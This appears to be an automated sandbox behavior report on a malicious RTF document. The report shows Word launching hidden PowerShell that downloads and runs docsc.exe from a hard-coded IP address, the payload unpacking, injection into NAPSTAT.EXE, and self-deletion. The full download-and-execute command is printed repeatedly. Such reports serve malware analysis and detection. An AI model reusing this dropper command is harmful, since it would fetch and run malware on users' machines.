Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.p.............}..v....P.......0................"}....."....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j.....&}...............p.............}..v....P.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G..................j......................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j.....&}...............p.............}..v....P.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S..................j......................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._.......e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........."}.....H....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._..................j....8.................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j.....&}...............p.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k..................j....0.................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....w..................j.....&}...............p.............}..v............0.......................f....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....w..................j......................p.............}..v.... .......0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....&}...............p.............}..v............0................"}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....h.................p.............}..v............0...............X#}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.^.....................@/.j......}...............p.............}..v.....N......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....pO................p.............}..v.....O......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....V......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....8W................p.............}..v.....W......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.4.............}..v.....[......0...............H.}.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....\................p.............}..v.....]......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....c......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....d................p.............}..v.....e......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....k......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....l................p.............}..v.....m......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.d.o.c.s.c...e.x.e.'.........H.}.....H....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....r................p.............}..v....0s......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v.....y......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j.....z................p.............}..v....0{......0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....H.......0...............H.}.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j......................p.............}..v............0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................@/.j......}...............p.............}..v....H.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j......................p.............}..v............0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............H.}.....<....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....x.................p.............}..v............0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......@/.j......}...............p.............}..v............0...............H.}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.................... ..j....@.................p.............}..v............0.................}............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 1c60a1e9_by_Libranalysis.rtf ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Roaming\docsc.exe Unpacked PE file: 10.2.docsc.exe.bd0000.3.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
PE file contains sections with non-standard names
Source: docsc[1].exe.0.dr Static PE information: section name: U#j;F_`
Source: docsc[1].exe.0.dr Static PE information: section name:
Source: docsc.exe.3.dr Static PE information: section name: U#j;F_`
Source: docsc.exe.3.dr Static PE information: section name:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004392EF push ss; ret 10_2_004392F7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00438F95 push edi; ret 10_2_00438F96
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B5C2 push cs; retf 11_2_00C8B5D2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C88FD4 push ds; ret 11_2_00C8902C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8ADE3 pushad ; retf 11_2_00C8AE36
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B5F8 push cs; retf 11_2_00C8B60E
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B9FA push ss; retf 11_2_00C8B9FE
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C88485 push ds; ret 11_2_00C884A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8BB44 push ds; retf 11_2_00C8BB54
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B346 push cs; retf 11_2_00C8B5D2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8BB56 push ds; retf 11_2_00C8BB5A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8AE02 pushad ; retf 11_2_00C8AE36
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C88118 push FFFFFF8Fh; retf 11_2_00C8811D
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B610 push cs; retf 11_2_00C8B650
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8BB32 push ds; retf 11_2_00C8BB36
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004161E7 push edi; retf 12_2_004161E8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004151B4 pushfd ; ret 12_2_004151D9
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B3B5 push eax; ret 12_2_0041B408
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B46C push eax; ret 12_2_0041B472
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B402 push eax; ret 12_2_0041B408
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B40B push eax; ret 12_2_0041B472
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041543B pushfd ; iretd 12_2_0041543E
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00415485 push edx; ret 12_2_00415496
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073DFA1 push ecx; ret 12_2_0073DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020ADFA1 push ecx; ret 14_2_020ADFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000951B4 pushfd ; ret 14_2_000951D9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000961E7 push edi; retf 14_2_000961E8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B3B5 push eax; ret 14_2_0009B408
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B40B push eax; ret 14_2_0009B472
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B402 push eax; ret 14_2_0009B408
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009543B pushfd ; iretd 14_2_0009543E
Source: initial sample Static PE information: section name: U#j;F_` entropy: 7.99977911602
Source: initial sample Static PE information: section name: U#j;F_` entropy: 7.99977911602

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\docsc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
